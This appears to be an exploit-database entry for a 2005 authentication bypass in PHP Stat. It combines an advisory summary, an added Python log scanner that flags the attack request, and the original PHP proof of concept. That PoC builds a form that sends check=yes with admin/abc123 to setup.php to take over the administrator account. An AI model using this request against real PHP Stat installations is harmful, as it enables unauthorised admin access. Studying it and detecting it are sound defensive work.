vendor: PHP Stat
by: Trap-Set Underground Hacking Team
CVSS: 7.5 HIGH
Authentication Bypass
CWE: 287
Product Name: PHP Stat
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

PHP Stat Administrative User Authentication Bypass POC Exploit

This exploit allows an attacker to bypass authentication for the PHP Stat administrative user. The attacker sends a crafted HTTP request to setup.php on the vulnerable server with check=yes and the username and password set to 'admin' and 'abc123' respectively, which gives the attacker access to the administrative user account.

Mitigation:

Ensure that authentication is properly implemented and that all user input is properly sanitized.
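
For detection, an added example (not part of the original advisory or the PoC) that scans web server access logs for the request shape the PoC form below submits: setup.php with check=yes plus username and password parameters. The log lines are constructed, the combined log format is an assumption, and only requests whose parameters appear in the URL are visible this way.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx combined log format (assumed format).
SAMPLE_LOG = """\
203.0.113.7 - - [30/May/2005:10:01:02 +0000] "GET /setup.php?check=yes&username=admin&password=abc123 HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.4 - - [30/May/2005:10:02:10 +0000] "GET /index.php?page=stats HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
203.0.113.7 - - [30/May/2005:10:03:44 +0000] "GET /stat/SETUP.PHP?username=x&check=yes&password=y HTTP/1.1" 302 0 "-" "Mozilla/4.0"
198.51.100.9 - - [30/May/2005:10:04:00 +0000] "GET /setup.php HTTP/1.1" 200 900 "-" "Mozilla/4.0"
not a log line
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def is_setup_credential_request(target):
    """True when the request targets setup.php with check=yes and both
    credential parameters, the shape of the request described above."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/setup.php"):
        return False
    q = parse_qs(parts.query, keep_blank_values=True)
    return q.get("check", [""])[-1].lower() == "yes" and "username" in q and "password" in q

def find_hits(log_text):
    """Return {source_ip: [(timestamp, status, path), ...]} for matching lines.
    Parameter values are not kept, so credentials are not copied into alerts."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and is_setup_credential_request(m["target"]):
            hits[m["ip"]].append((m["ts"], int(m["status"]), urlsplit(m["target"]).path))
    return dict(hits)

if __name__ == "__main__":
    for ip, events in find_hits(SAMPLE_LOG).items():
        for ts, status, path in events:
            print(f"{ts} {ip} {path} -> HTTP {status}")
```

Any hit from an address that is not an administrator's is worth following up with a review of the PHP Stat admin credentials.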
Source

Exploit-DB raw data:

<?php
error_reporting(E_PARSE);
/*
================================================================
PHP Stat Administrative User Authentication Bypass POC Exploit
================================================================
====Trap-Set Underground Hacking Team===========mh_p0rtal============

Greetz to : Alpha_programmer , Oil_karchack , Str0ke   And Iranian Hacking & Security Teams :
Alphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam
, CrouZ Security Team , Simorgh-ev Security Team ,

====================^^^^^^^^^^^^^^^^^^^-=========================
*/
# Config ________________________________
# address - example: http://www.site.com/setup.php Or www.site.com /dir/setup.php

$url = "http://www.site.com/setup.php";

# EnD ___________________________________

print "<form action=\"$url?check=yes&username=$username&password=$password\" >";
print "<input type=\"hidden\" name=\"check\"  value=\"yes\">";
print "Username : <input type=\"text\" name=\"username\"  value=\"admin\" size=\"25\"><br>";
print "Password : <input type=\"text\" name=\"password\"  value=\"abc123\" size=\"25\"><br>";
print ("<input type=submit value=::Change. > \n");
print "</form>";

//------------------------------------------------------End.
?>

# milw0rm.com [2005-05-30]